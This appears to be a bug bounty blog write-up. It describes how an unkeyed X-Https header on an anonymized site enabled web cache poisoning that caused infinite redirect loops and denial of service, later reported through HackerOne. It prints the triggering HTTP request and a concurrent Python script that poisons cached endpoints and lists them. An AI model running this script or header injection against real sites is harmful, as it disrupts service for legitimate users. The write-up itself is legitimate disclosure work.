From Minor Bug to Major DoS: My Journey with Web Cache Poisoning
It started with a routine exploration of the samlsso
endpoint on a [redacted] platform. At first, it seemed like a typical authentication endpoint, but a small anomaly hinted at something deeper.
Disclaimer: The domain names used in this write-up are anonymized as
redacted.com
for privacy and security reasons.
The First Clue: Playing with samlsso
While testing, I discovered that the samlsso
endpoint accepted an additional header called X-Https
, which caused the server to issue a 301
redirect. Here’s the request I used to observe this behavior:
POST /samlsso/?cache=foobar HTTP/2
Host: www.redacted.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.redacted.com/account/details.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
X-Https: foobar
HTTP/1.1 301 Moved Permanently
Location: https://www.redacted.com/samlsso?cache=foobar
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
The server’s response was clear — it issued a 301
redirect. While this by itself wasn’t a vulnerability since the request wasn’t cached, it provided a clue: the server might also accept X-Https
on cacheable endpoints.
Building a Theory: Testing Cacheable Endpoints
To test my hypothesis, I needed to check cacheable endpoints for similar behavior. Instead of manual testing, I automated the process using a Python script. The list of URLs (crawled.txt
) was generated using Burp Suite’s crawler, which mapped out all the accessible endpoints on the domain.
Here’s the the script I used:
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.exceptions import TooManyRedirects, RequestException
# Load crawled endpoints and add cache buster
with open("crawled.txt", "r") as f:
endpoints = [url.strip() + "?cache=foobar" for url in f.readlines()]
vulnerable_endpoints = []
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0",
"Accept": "*/*",
"X-Https": "foobar"
}
# Create a session with max_redirects set to 5
session = requests.Session()
session.headers.update(headers)
session.max_redirects = 5
# Custom adapter to modify headers for redirects
class NoXHttpsRedirectAdapter(requests.adapters.HTTPAdapter):
def send(self, request, **kwargs):
# Check if the request has a previous response (redirect)
response = super().send(request, **kwargs)
# If we have a redirect, remove the 'X-Https' header
if response.history:
request.headers.pop('X-Https', None)
return response
# Mount the adapter to the session
adapter = NoXHttpsRedirectAdapter()
session.mount('http://', adapter)
session.mount('https://', adapter)
def check_endpoint(endpoint):
try:
# Use the session to send the GET request
response = session.get(endpoint, timeout=10)
except TooManyRedirects:
# If TooManyRedirects exception occurs, it means we hit the max redirect limit
print(f"[VULNERABLE] Infinite redirect detected: {endpoint}")
return endpoint
except RequestException as e:
print(f"[ERROR] Failed to check {endpoint}: {e}")
return None
# Use ThreadPoolExecutor to check endpoints concurrently
with ThreadPoolExecutor(max_workers=10) as executor:
future_to_endpoint = {executor.submit(check_endpoint, endpoint): endpoint for endpoint in endpoints}
for future in as_completed(future_to_endpoint):
result = future.result()
if result:
vulnerable_endpoints.append(result)
# Save the results
with open("poisoned_endpoints.txt", "w") as f:
for url in vulnerable_endpoints:
f.write(url + "\n")
How the Script Works
- Loading and Preparing Endpoints:
The script reads URLs fromcrawled.txt
and appends?cache=foobar
to avoid poisoning live URLs. - Sending Concurrent Requests:
UsingThreadPoolExecutor
, the script sends requests concurrently with theX-Https
header, making the process faster. - Checking Redirects:
It checks if the response indicates infinite or multiple redirects. A match signals a poisoned cache, causing infinite redirects. - Saving Results:
Vulnerable URLs are saved inpoisoned_endpoints.txt
.
Jackpot: Finding Vulnerable Endpoints
Within minutes, the script identified several poisoned endpoints. Opening these URLs in a browser revealed the infinite redirect issue in action. The browser would continuously loop, unable to load the page, effectively causing a Denial of Service (DoS).
Triaged by HackerOne
After responsibly disclosing the issue, it was quickly triaged and confirmed by the security team on HackerOne. Below is a screenshot of the triaged report for reference:
Conclusion: From Small Clue to Major Vulnerability
This experience demonstrated how a minor clue, like a 301
redirect, can lead to discovering a critical vulnerability capable of mass DoS on the root domain. By exploiting web cache poisoning, I was able to identify multiple endpoints that could disrupt service for legitimate users.
Responsible disclosure ensured these vulnerabilities were patched without causing harm. For bug hunters, it’s a reminder that persistence and creative thinking can turn small hints into major finds.